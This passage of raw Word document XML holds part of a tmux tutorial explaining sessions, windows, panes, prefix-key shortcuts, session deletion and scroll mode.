    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-t" stands for target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detach from a session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Press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followed by </w:t>
      </w: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w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Basic Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A collection of </w:t>
      </w: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windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Window</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A single terminal screen within a session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pane</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A split terminal within a window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Key Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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uses a prefix (default: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followed by a command.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> For example,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followed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a new window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prefix key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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD1">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Session Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detach: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d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename session: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BD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch sessions: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s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete a session:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While inside the Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="6aa84f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outside you are outside tmux (target session is detached)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1049"/>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tmux kill-session -t session_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete all active sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux kill-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if the Session is Deleted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDE">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Window Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New window: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c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch windows: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n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (next) or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(previous)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to a specific window: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the window number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Close window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>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&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>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3BE4">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Pane Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Split horizontally: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(double quote)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Split vertically: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BE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch panes: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arrow keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resize panes: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hold </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use arrow keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Close pane: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x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BEB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To enter Scroll Mode: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BED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can start scrolling using the wheel on the mouse, or using arrows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1066"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To quit Scroll Mode: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
